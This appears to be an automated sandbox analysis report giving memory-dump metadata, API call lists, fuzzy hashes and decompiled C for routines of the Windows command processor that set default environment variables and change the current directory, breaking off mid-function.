                                                    0x011dd1de
                                                    0x00000000
                                                    0x011dd1de
                                                    0x011dd19f
                                                    0x011dd1a2
                                                    0x011dd1ab
                                                    0x011dd1b0
                                                    0x011dd254
                                                    0x00000000
                                                    0x00000000
                                                    0x011dd25f
                                                    0x011dd265
                                                    0x011dd26b
                                                    0x00000000
                                                    0x00000000
                                                    0x011dd273
                                                    0x011dd27c
                                                    0x011dd290
                                                    0x011eb577
                                                    0x011eb57d
                                                    0x011eb584
                                                    0x00000000
                                                    0x00000000
                                                    0x011eb58d
                                                    0x011eb59c
                                                    0x011eb58f
                                                    0x011eb590
                                                    0x011eb596
                                                    0x00000000
                                                    0x011eb58d
                                                    0x011dd296
                                                    0x011dd2ab
                                                    0x011eb5a9
                                                    0x011eb5b4
                                                    0x011eb5b4
                                                    0x011dd2b6
                                                    0x011eb5c4
                                                    0x011eb5cf
                                                    0x011eb5cf
                                                    0x011dd2b6
                                                    0x011dd1b6
                                                    0x011dd1b6
                                                    0x011dd1b9
                                                    0x011dd1c0
                                                    0x011dd1c5
                                                    0x011eb5da
                                                    0x011eb5e2
                                                    0x011eb5e8
                                                    0x011dd1d2
                                                    0x011dd1d5
                                                    0x011dd1dc
                                                    0x00000000
                                                    0x011dd1dc
                                                    0x011dd180
                                                    0x00000000

                                                    APIs
                                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,?,0000000C,00000004,00000080,00000000), ref: 011DD18E
                                                    • _open_osfhandle.MSVCRT ref: 011DD1A2
                                                    • _wcsicmp.MSVCRT ref: 011DD1EF
                                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00000003,0000000C,00000003,00000080,00000000,011FF830,00002000), ref: 011DD221
                                                    • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 011DD25F
                                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 011DD287
                                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000001,?,00000000), ref: 011DD2A3
                                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,FFFFFFFF,00000002), ref: 011EB5B4
                                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 011EB5CF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: File$Pointer$Create$ReadSize_open_osfhandle_wcsicmp
                                                    • String ID: con
                                                    • API String ID: 686027947-4257191772
                                                    • Opcode ID: 64c3505c91936b72e4b3a4c85733a80c722dd3887d70ba059809142a7a20a573
                                                    • Instruction ID: 66505b56df8f293d09b86d5a0b2db156b08ff371d17eb2aad300261ee6bbb50f
                                                    • Opcode Fuzzy Hash: 64c3505c91936b72e4b3a4c85733a80c722dd3887d70ba059809142a7a20a573
                                                    • Instruction Fuzzy Hash: AC51F870A00214ABEF28CBE8FC4DBBE7AF9EF45724F110219F925E22C4DB7199458751
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DCEA9, Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 167COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E011DCEA9() {
				signed int _v8;
				long _v12;
				char _v16;
				int _v20;
				void _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t30;
				WCHAR* _t41;
				struct HINSTANCE__* _t50;
				struct HINSTANCE__* _t52;
				void* _t53;
				int _t55;
				void* _t56;
				struct HINSTANCE__* _t78;
				signed int _t79;
				struct HINSTANCE__* _t81;
				void* _t85;
				int* _t88;
				void* _t89;
				struct HINSTANCE__* _t91;
				struct HINSTANCE__* _t96;
				signed int _t98;

				_t30 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t30 ^ _t98;
				_t91 = 0;
				_v12 = 0x104;
				_v20 = 0;
				_v16 = 1;
				memset( &_v540, 0, 0x104);
				if(E011E0C70( &_v540, ((0 | _v16 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					do {
						__eflags = E011E4B60(__eflags, 0);
					} while (__eflags == 0);
					exit(1);
					L13:
					_t41 =  &_v540;
					L2:
					GetModuleFileNameW(_t91, _t41, _v12);
					if(E011DCFBC(L"PATH") == 0) {
						E011E3A50(L"PATH", 0x11d24ac);
					}
					if(E011DCFBC(L"PATHEXT") == 0) {
						E011E3A50(L"PATHEXT", L".COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC");
					}
					_t95 = L"PROMPT";
					if(E011DCFBC(L"PROMPT") == 0) {
						E011E3A50(L"PROMPT", L"$P$G");
					}
					if(E011DCFBC(L"COMSPEC") == 0) {
						_t68 = _v20;
						__eflags = _v20;
						if(_v20 == 0) {
							_t68 =  &_v540;
						}
						_t85 = 0x2e;
						_t50 = E011DD7D4(_t68, _t85);
						__eflags = _t50;
						if(_t50 != 0) {
							L33:
							_t86 = _v20;
							__eflags = _v20;
							if(_v20 == 0) {
								_t86 =  &_v540;
							}
							E011E3A50(L"COMSPEC", _t86);
							goto L6;
						} else {
							__imp___wcsupr(L"CMD.EXE");
							_t78 = _v20;
							_t96 = _t78;
							__eflags = _t78;
							if(_t78 == 0) {
								_t96 =  &_v540;
							}
							_t88 =  &(_t96->i);
							do {
								_t55 = _t96->i;
								_t96 =  &(_t96->i);
								__eflags = _t55 - _t91;
							} while (_t55 != _t91);
							_t91 = _t78;
							_t95 = _t96 - _t88 >> 1;
							__eflags = _t78;
							if(_t78 == 0) {
								_t91 =  &_v540;
								_t78 = _t91;
							}
							_t89 = 0x5c;
							_t56 = E011E2349(_t78, _t89);
							_t79 = _t95 - 1;
							__eflags = _t91 + _t79 * 2 - _t56;
							_t81 = _v20;
							if(_t91 + _t79 * 2 == _t56) {
								__eflags = _t81;
								if(_t81 == 0) {
									_t81 =  &_v540;
								}
								_push(L"CMD.EXE");
							} else {
								__eflags = _t81;
								if(_t81 == 0) {
									_t81 =  &_v540;
								}
								_push(L"\\CMD.EXE");
							}
							E011E18C0(_t81, _v12);
							goto L33;
						}
					} else {
						L6:
						_t52 = E011DCFBC(L"KEYS");
						if(_t52 != 0) {
							__imp___wcsicmp(_t52, L"ON");
							__eflags = _t52;
							if(__eflags == 0) {
								 *0x121852c = 1;
							}
						}
						_t73 =  *0x1213cb8;
						_t109 =  *0x1213cb8;
						if( *0x1213cb8 == 0) {
							_t73 = 0x1213ab0;
						}
						_t53 = E011E33FC(1, _t73, 1, _t91, _t95, _t109);
						__imp__??_V@YAXPAX@Z();
						return E011E6FD0(_t53, 1, _v8 ^ _t98, 1, _t91, _t95, _v20);
					}
				}
				_t41 = _v20;
				if(_t41 == 0) {
					goto L13;
				}
				goto L2;
			}




























                                                    0x011dceb4
                                                    0x011dcebb
                                                    0x011dcecc
                                                    0x011dcece
                                                    0x011dced4
                                                    0x011dceda
                                                    0x011dcedd
                                                    0x011dcf03
                                                    0x011eb419
                                                    0x011eb41f
                                                    0x011eb41f
                                                    0x011eb424
                                                    0x011eb42a
                                                    0x011eb42a
                                                    0x011dcf14
                                                    0x011dcf19
                                                    0x011dcf2d
                                                    0x011eb43c
                                                    0x011eb43c
                                                    0x011dcf41
                                                    0x011eb44d
                                                    0x011eb44d
                                                    0x011dcf47
                                                    0x011dcf55
                                                    0x011dcfae
                                                    0x011dcfae
                                                    0x011dcf63
                                                    0x011eb457
                                                    0x011eb45a
                                                    0x011eb45c
                                                    0x011eb45e
                                                    0x011eb45e
                                                    0x011eb466
                                                    0x011eb467
                                                    0x011eb46c
                                                    0x011eb46e
                                                    0x011eb4e8
                                                    0x011eb4e8
                                                    0x011eb4eb
                                                    0x011eb4ed
                                                    0x011eb4ef
                                                    0x011eb4ef
                                                    0x011eb4fa
                                                    0x00000000
                                                    0x011eb470
                                                    0x011eb475
                                                    0x011eb47c
                                                    0x011eb47f
                                                    0x011eb481
                                                    0x011eb483
                                                    0x011eb485
                                                    0x011eb485
                                                    0x011eb48b
                                                    0x011eb48e
                                                    0x011eb48e
                                                    0x011eb491
                                                    0x011eb494
                                                    0x011eb494
                                                    0x011eb49b
                                                    0x011eb49d
                                                    0x011eb49f
                                                    0x011eb4a1
                                                    0x011eb4a3
                                                    0x011eb4a9
                                                    0x011eb4a9
                                                    0x011eb4ad
                                                    0x011eb4ae
                                                    0x011eb4b3
                                                    0x011eb4b9
                                                    0x011eb4bb
                                                    0x011eb4be
                                                    0x011eb4d1
                                                    0x011eb4d3
                                                    0x011eb4d5
                                                    0x011eb4d5
                                                    0x011eb4db
                                                    0x011eb4c0
                                                    0x011eb4c0
                                                    0x011eb4c2
                                                    0x011eb4c4
                                                    0x011eb4c4
                                                    0x011eb4ca
                                                    0x011eb4ca
                                                    0x011eb4e3
                                                    0x00000000
                                                    0x011eb4e3
                                                    0x011dcf69
                                                    0x011dcf69
                                                    0x011dcf6e
                                                    0x011dcf75
                                                    0x011eb50a
                                                    0x011eb512
                                                    0x011eb514
                                                    0x011eb51a
                                                    0x011eb51a
                                                    0x011eb514
                                                    0x011dcf7b
                                                    0x011dcf81
                                                    0x011dcf83
                                                    0x011dcfb5
                                                    0x011dcfb5
                                                    0x011dcf87
                                                    0x011dcf8f
                                                    0x011dcfa6
                                                    0x011dcfa6
                                                    0x011dcf63
                                                    0x011dcf09
                                                    0x011dcf0e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                    • memset.MSVCRT ref: 011DCEDD
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                    • GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001), ref: 011DCF19
                                                      • Part of subcall function 011DCFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,011FF830,00002000,?,?,?,?,?,011E373A,011D590A,00000000), ref: 011DCFDF
                                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD005
                                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD01B
                                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD031
                                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD047
                                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD05D
                                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD073
                                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD085
                                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD09B
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DCF8F
                                                    • exit.MSVCRT ref: 011EB424
                                                    • _wcsupr.MSVCRT ref: 011EB475
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
                                                    • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                    • API String ID: 2336066422-4197029667
                                                    • Opcode ID: 6ab7b19cae45f4baaf6f83616a21bb29c37f8a13c9227a95be69f45e64075f1c
                                                    • Instruction ID: b3eeafd94dc2fe9e9e3be91e5d79259d8d0dbc66d93d7a167d8106944e83d4a4
                                                    • Opcode Fuzzy Hash: 6ab7b19cae45f4baaf6f83616a21bb29c37f8a13c9227a95be69f45e64075f1c
                                                    • Instruction Fuzzy Hash: 6651E531B0461A97DF2CDBA5985C6FFB7A5EFA0108B04449DE817A3184DF349D45CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E33FC, Relevance: 24.3, APIs: 16, Instructions: 307COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 87%
                                                    			E011E33FC(short __ebx, WCHAR* __ecx, WCHAR* __edx, WCHAR* __edi, void* __esi, void* __eflags) {
				void* _t75;
				short _t86;
				WCHAR* _t87;
				WCHAR* _t88;
				signed short* _t90;
				short _t93;
				int _t94;
				WCHAR* _t96;
				WCHAR* _t105;
				short _t109;
				WCHAR* _t113;
				WCHAR* _t115;
				WCHAR* _t125;
				signed int _t126;
				void* _t131;
				WCHAR* _t142;
				WCHAR* _t145;
				WCHAR* _t153;
				short* _t164;
				WCHAR* _t166;
				signed int _t168;
				WCHAR* _t169;
				short* _t176;
				void* _t177;

				_t173 = __edi;
				_t135 = __ebx;
				_push(0x240);
				_push(0x11fbdd8);
				E011E75CC(__ebx, __edi, __esi);
				 *(_t177 - 0x24c) = __edx;
				_t175 = __ecx;
				_t75 = 0x5c;
				if( *((intOrPtr*)(__ecx)) == _t75) {
					if( *((intOrPtr*)(__ecx + 2)) != _t75) {
						goto L1;
					} else {
					}
				} else {
					L1:
					E011E0D51(_t177 - 0x244);
					if(E011E0C70(_t177 - 0x244, ((0 |  *((intOrPtr*)(_t177 - 0x38)) == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
						L52:
						E011E0DE8(_t82, _t177 - 0x244);
						goto L54;
					} else {
						_t173 = E011DDF40(_t175);
						 *(_t177 - 0x250) = _t173;
						if(_t173 == 0) {
							goto L52;
						} else {
							 *((intOrPtr*)(_t177 - 4)) = 0;
							_t142 = _t173;
							_t9 =  &(_t142[1]); // 0x2
							_t164 = _t9;
							do {
								_t86 =  *_t142;
								_t142 =  &(_t142[1]);
							} while (_t86 != 0);
							_t87 =  &(_t173[_t142 - _t164 >> 1]);
							_t145 = _t87;
							while(1) {
								 *(_t177 - 0x248) = _t87;
								if(_t145 <= _t173) {
									break;
								}
								_t13 = _t87 - 2; // -4
								_t145 = _t13;
								if( *_t145 == 0x20) {
									_t87 = _t145;
									continue;
								}
								break;
							}
							 *_t87 = 0;
							_t88 =  *(_t177 - 0x3c);
							if(_t88 == 0) {
								_t88 = _t177 - 0x244;
							}
							GetCurrentDirectoryW( *(_t177 - 0x34), _t88);
							_t90 =  *(_t177 - 0x3c);
							if(_t90 == 0) {
								_t90 = _t177 - 0x244;
							}
							_t135 = towupper( *_t90 & 0x0000ffff);
							_t93 = 0x3d;
							 *((short*)(_t177 - 0x28)) = _t93;
							_t94 = iswalpha( *_t173 & 0x0000ffff);
							_t175 = 0x3a;
							if(_t94 == 0 || _t173[1] != _t175) {
								 *((short*)(_t177 - 0x26)) = _t135;
							} else {
								 *((short*)(_t177 - 0x26)) = towupper( *_t173 & 0x0000ffff);
							}
							 *(_t177 - 0x24) = _t175;
							 *((short*)(_t177 - 0x22)) = 0;
							_t96 =  *(_t177 - 0x3c);
							if(_t96 == 0) {
								_t96 = _t177 - 0x244;
							}
							_t97 = GetFullPathNameW(_t173,  *(_t177 - 0x34), _t96, _t177 - 0x248);
							if(_t97 == 0) {
								L62:
								_t175 = GetLastError();
								goto L64;
							} else {
								if(_t97 >  *(_t177 - 0x34)) {
									L65:
									E011E0DE8(_t97, _t177 - 0x244);
									_push(0xfffffffe);
									_push(_t177 - 0x10);
									_push(0x11fd0b4);
									L011E82BB();
								} else {
									_t153 =  *(_t177 - 0x3c);
									_t105 = _t153;
									if(_t153 == 0) {
										_t105 = _t177 - 0x244;
									}
									if( *_t105 == 0) {
										L55:
										E011E0DE8(_t105, _t177 - 0x244);
										_push(0xfffffffe);
										_push(_t177 - 0x10);
										_push(0x11fd0b4);
										L011E82BB();
										_push(3);
										goto L56;
									} else {
										if(_t153 == 0) {
											_t105 = _t177 - 0x244;
										}
										if(_t105[1] != _t175) {
											goto L55;
										} else {
											_t166 = _t153;
											if(_t153 == 0) {
												_t166 = _t177 - 0x244;
											}
											_t176 =  &(_t166[1]);
											do {
												_t109 =  *_t166;
												_t166 =  &(_t166[1]);
											} while (_t109 !=  *((intOrPtr*)(_t177 - 4)));
											_t168 = _t166 - _t176 >> 1;
											if(_t153 == 0) {
												_t153 = _t177 - 0x244;
											}
											_t169 =  &(_t153[_t168]);
											while(1) {
												_t175 = _t169;
												 *(_t177 - 0x248) = _t169;
												if(_t175 <= E011E6CF0(_t177 - 0x244) + 6) {
													break;
												}
												_t131 = 0x5c;
												if( *((intOrPtr*)(_t169 - 2)) == _t131) {
													_t169 = _t175 - 2;
													continue;
												}
												break;
											}
											 *_t169 = 0;
											_t113 =  *(_t177 - 0x3c);
											if(_t113 == 0) {
												_t113 = _t177 - 0x244;
											}
											if(GetFileAttributesW(_t113) == 0xffffffff) {
												_t175 = GetLastError();
												if(_t175 == 2 || _t175 == 3) {
													goto L29;
												} else {
													if(_t175 != 0x7b) {
														goto L64;
													} else {
														goto L29;
													}
												}
											} else {
												L29:
												if( *0x1213cc9 == 0) {
													L32:
													_t175 =  *(_t177 - 0x24c);
													if(_t175 == 2) {
														L36:
														if(_t175 == 0 || _t175 == 1 && _t135 ==  *((intOrPtr*)(_t177 - 0x26))) {
															_t115 =  *(_t177 - 0x3c);
															if(_t115 == 0) {
																_t115 = _t177 - 0x244;
															}
															if(SetCurrentDirectoryW(_t115) == 0) {
																goto L62;
															} else {
																goto L41;
															}
														} else {
															L41:
															_t170 =  *(_t177 - 0x3c);
															if( *(_t177 - 0x3c) == 0) {
																_t170 = _t177 - 0x244;
															}
															if(E011E3A50(_t177 - 0x28, _t170) != 0) {
																E011E0DE8(_t117, _t177 - 0x244);
																_push(0xfffffffe);
																_push(_t177 - 0x10);
																_push(0x11fd0b4);
																L011E82BB();
																L54:
																_push(8);
																L56:
															} else {
																_t158 =  *0x1213cb8;
																if( *0x1213cb8 == 0) {
																	_t158 = 0x1213ab0;
																}
																E011E36CB(_t135, _t158,  *0x1213cc0, 0);
																 *((intOrPtr*)(_t177 - 4)) = 0xfffffffe;
																E011E0DE8(E011E36AC(_t173), _t177 - 0x244);
															}
														}
													} else {
														_t125 =  *(_t177 - 0x3c);
														if(_t125 == 0) {
															_t125 = _t177 - 0x244;
														}
														_t126 = GetFileAttributesW(_t125);
														if(_t126 == 0xffffffff) {
															_t98 = GetLastError();
															_t175 = _t98;
															if(_t98 == 2) {
																_t175 = 3;
															}
															L64:
															E011E0DE8(_t98, _t177 - 0x244);
															_push(0xfffffffe);
															_push(_t177 - 0x10);
															_push(0x11fd0b4);
															L011E82BB();
														} else {
															if((_t126 & 0x00000410) == 0) {
																E011E0DE8(_t126, _t177 - 0x244);
																_push(0xfffffffe);
																_push(_t177 - 0x10);
																_push(0x11fd0b4);
																L011E82BB();
															} else {
																goto L36;
															}
														}
													}
												} else {
													_t161 =  *(_t177 - 0x3c);
													if( *(_t177 - 0x3c) == 0) {
														_t161 = _t177 - 0x244;
													}
													if(E011E245C(_t161,  *(_t177 - 0x34), 0) == 0) {
														goto L65;
													} else {
														goto L32;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return E011E7614(_t135, _t173, _t175);
			}



























                                                    0x011e33fc
                                                    0x011e33fc
                                                    0x011e33fc
                                                    0x011e3401
                                                    0x011e3406
                                                    0x011e340b
                                                    0x011e3411
                                                    0x011e3415
                                                    0x011e3419
                                                    0x011edc11
                                                    0x00000000
                                                    0x011edc17
                                                    0x011edc17
                                                    0x011e341f
                                                    0x011e341f
                                                    0x011e3425
                                                    0x011e344b
                                                    0x011edc21
                                                    0x011edc27
                                                    0x00000000
                                                    0x011e3451
                                                    0x011e3458
                                                    0x011e345a
                                                    0x011e3462
                                                    0x00000000
                                                    0x011e3468
                                                    0x011e346a
                                                    0x011e346d
                                                    0x011e346f
                                                    0x011e346f
                                                    0x011e3472
                                                    0x011e3472
                                                    0x011e3475
                                                    0x011e3478
                                                    0x011e3481
                                                    0x011e3484
                                                    0x011e3486
                                                    0x011e3486
                                                    0x011e348e
                                                    0x00000000
                                                    0x00000000
                                                    0x011e3490
                                                    0x011e3490
                                                    0x011e3497
                                                    0x011edc76
                                                    0x00000000
                                                    0x011edc76
                                                    0x00000000
                                                    0x011e3497
                                                    0x011e349f
                                                    0x011e34a2
                                                    0x011e34a7
                                                    0x011edc7d
                                                    0x011edc7d
                                                    0x011e34b1
                                                    0x011e34b7
                                                    0x011e34bc
                                                    0x011edc88
                                                    0x011edc88
                                                    0x011e34cd
                                                    0x011e34d2
                                                    0x011e34d3
                                                    0x011e34db
                                                    0x011e34e4
                                                    0x011e34e7
                                                    0x011edc93
                                                    0x011e34f7
                                                    0x011e3502
                                                    0x011e3502
                                                    0x011e3506
                                                    0x011e350c
                                                    0x011e3510
                                                    0x011e3515
                                                    0x011edc9c
                                                    0x011edc9c
                                                    0x011e3527
                                                    0x011e352f
                                                    0x011edca7
                                                    0x011edcad
                                                    0x00000000
                                                    0x011e3535
                                                    0x011e3538
                                                    0x011edcd9
                                                    0x011edcdf
                                                    0x011edce4
                                                    0x011edce9
                                                    0x011edcea
                                                    0x011edcef
                                                    0x011e353e
                                                    0x011e353e
                                                    0x011e3543
                                                    0x011e3545
                                                    0x011edd01
                                                    0x011edd01
                                                    0x011e3550
                                                    0x011edc50
                                                    0x011edc56
                                                    0x011edc5b
                                                    0x011edc60
                                                    0x011edc61
                                                    0x011edc66
                                                    0x011edc6e
                                                    0x00000000
                                                    0x011e3556
                                                    0x011e355a
                                                    0x011edd0c
                                                    0x011edd0c
                                                    0x011e3564
                                                    0x00000000
                                                    0x011e356a
                                                    0x011e356c
                                                    0x011e356e
                                                    0x011edd17
                                                    0x011edd17
                                                    0x011e3574
                                                    0x011e3577
                                                    0x011e3577
                                                    0x011e357a
                                                    0x011e357d
                                                    0x011e3585
                                                    0x011e3589
                                                    0x011edd22
                                                    0x011edd22
                                                    0x011e358f
                                                    0x011e3592
                                                    0x011e3592
                                                    0x011e3594
                                                    0x011e35aa
                                                    0x00000000
                                                    0x00000000
                                                    0x011e35ae
                                                    0x011e35b3
                                                    0x011e36a4
                                                    0x00000000
                                                    0x011e36a4
                                                    0x00000000
                                                    0x011e35b3
                                                    0x011e35bb
                                                    0x011e35be
                                                    0x011e35c3
                                                    0x011edd2d
                                                    0x011edd2d
                                                    0x011e35d3
                                                    0x011edd3e
                                                    0x011edd43
                                                    0x00000000
                                                    0x011edd52
                                                    0x011edd55
                                                    0x00000000
                                                    0x011edd5b
                                                    0x00000000
                                                    0x011edd5b
                                                    0x011edd55
                                                    0x011e35d9
                                                    0x011e35d9
                                                    0x011e35e0
                                                    0x011e3600
                                                    0x011e3600
                                                    0x011e3609
                                                    0x011e3631
                                                    0x011e3633
                                                    0x011e3640
                                                    0x011e3645
                                                    0x011e36b4
                                                    0x011e36b4
                                                    0x011e3650
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e3656
                                                    0x011e3656
                                                    0x011e3656
                                                    0x011e365b
                                                    0x011e36bc
                                                    0x011e36bc
                                                    0x011e3667
                                                    0x011edc34
                                                    0x011edc39
                                                    0x011edc3e
                                                    0x011edc3f
                                                    0x011edc44
                                                    0x011edc4c
                                                    0x011edc4c
                                                    0x011edc70
                                                    0x011e366d
                                                    0x011e366d
                                                    0x011e3675
                                                    0x011e36c4
                                                    0x011e36c4
                                                    0x011e3680
                                                    0x011e3685
                                                    0x011e3697
                                                    0x011e369c
                                                    0x011e3667
                                                    0x011e360b
                                                    0x011e360b
                                                    0x011e3610
                                                    0x011edd6b
                                                    0x011edd6b
                                                    0x011e3617
                                                    0x011e3620
                                                    0x011edd76
                                                    0x011edd7c
                                                    0x011edd81
                                                    0x011edcb3
                                                    0x011edcb3
                                                    0x011edcb4
                                                    0x011edcba
                                                    0x011edcbf
                                                    0x011edcc4
                                                    0x011edcc5
                                                    0x011edcca
                                                    0x011e3626
                                                    0x011e362b
                                                    0x011edd92
                                                    0x011edd97
                                                    0x011edd9c
                                                    0x011edd9d
                                                    0x011edda2
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e362b
                                                    0x011e3620
                                                    0x011e35e2
                                                    0x011e35e2
                                                    0x011e35e7
                                                    0x011edd60
                                                    0x011edd60
                                                    0x011e35fa
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e35fa
                                                    0x011e35e0
                                                    0x011e35d3
                                                    0x011e3564
                                                    0x011e3550
                                                    0x011e3538
                                                    0x011e352f
                                                    0x011e3462
                                                    0x011e344b
                                                    0x011e36a3

                                                    APIs
                                                      • Part of subcall function 011E0D51: memset.MSVCRT ref: 011E0D7D
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                    • GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?,?,?,?,?), ref: 011E34B1
                                                    • towupper.MSVCRT ref: 011E34C6
                                                    • iswalpha.MSVCRT ref: 011E34DB
                                                    • towupper.MSVCRT ref: 011E34FB
                                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?), ref: 011E3527
                                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011E35CA
                                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011E3617
                                                    • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?), ref: 011E3648
                                                    • _local_unwind4.MSVCRT ref: 011EDC44
                                                    • _local_unwind4.MSVCRT ref: 011EDC66
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: AttributesCurrentDirectoryFile_local_unwind4memsettowupper$FullNamePathiswalpha
                                                    • String ID:
                                                    • API String ID: 2497804757-0
                                                    • Opcode ID: 89757e74eb3fd911d5b0f57a0a9d8bae4b7ff4cf7ee49cf7676934e79042b68d
                                                    • Instruction ID: 53e1ceb35c4a0677ef4ab30f813ccce29622c1e74c3a517601df7f046761f210
                                                    • Opcode Fuzzy Hash: 89757e74eb3fd911d5b0f57a0a9d8bae4b7ff4cf7ee49cf7676934e79042b68d
                                                    • Instruction Fuzzy Hash: F7B1E130E109169ADF2CEBE8E84CAFDB7F4FF14200F454569E52AD3290EB719A80CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DEA40, Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 413COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E011DEA40(signed short* __ecx, wchar_t* __edx, signed int _a4) {
				long _v8;
				signed int _v12;
				long _v16;
				wchar_t* _v20;
				long _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				long _v236;
				char* _v260;
				char _v264;
				wchar_t* _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t73;
				signed int _t79;
				signed short _t81;
				signed int _t82;
				long _t83;
				wchar_t* _t85;
				signed char _t86;
				signed int _t87;
				int _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				long _t94;
				signed int _t96;
				signed int _t104;
				signed int _t105;
				void* _t108;
				signed int _t109;
				signed int _t110;
				signed int* _t113;
				signed int _t114;
				signed int _t115;
				long _t116;
				signed int _t118;
				signed int _t121;
				signed int _t123;
				wchar_t* _t126;
				intOrPtr _t127;
				signed int _t128;
				signed int _t129;
				void* _t130;
				long _t134;
				wchar_t* _t135;
				wchar_t* _t136;
				signed int* _t137;
				intOrPtr* _t138;
				signed short* _t143;
				long _t144;
				long _t145;
				signed int _t150;
				signed int _t158;
				signed int _t159;
				long _t160;
				long _t164;
				void* _t169;
				signed int _t172;
				long _t173;
				signed int _t177;
				void* _t179;
				signed int _t180;
				signed int _t183;
				signed short* _t185;
				signed short* _t186;
				long _t187;
				signed int* _t188;
				signed int _t190;
				signed int _t191;
				void* _t193;

				_t167 = __edx;
				_t138 = __ecx;
				_t73 =  *0x11fd0b4; // 0x1805bc26
				_v12 = _t73 ^ _t191;
				_t186 = __ecx;
				_t136 = __edx;
				if(__ecx == 0) {
					_t139 = 4;
					_t75 = E011E00B0(4);
					__eflags = _t75;
					if(_t75 != 0) {
						goto L23;
					} else {
						E011F9287(4);
						__imp__longjmp(0x120b8b8, 1);
						goto L95;
					}
				} else {
					_t2 = _t138 + 2; // 0x2
					_t179 = _t2;
					do {
						_t127 =  *_t138;
						_t138 = _t138 + 2;
					} while (_t127 != 0);
					_t139 = 4 + (_t138 - _t179 >> 1) * 4;
					_t128 = E011E00B0(4 + (_t138 - _t179 >> 1) * 4);
					_v236 = _t128;
					if(_t128 == 0) {
						L95:
						E011F9287(_t139);
						__imp__longjmp(0x120b8b8, 1);
						goto L96;
					} else {
						_v228 = _t128;
						_t185 = L"=,;";
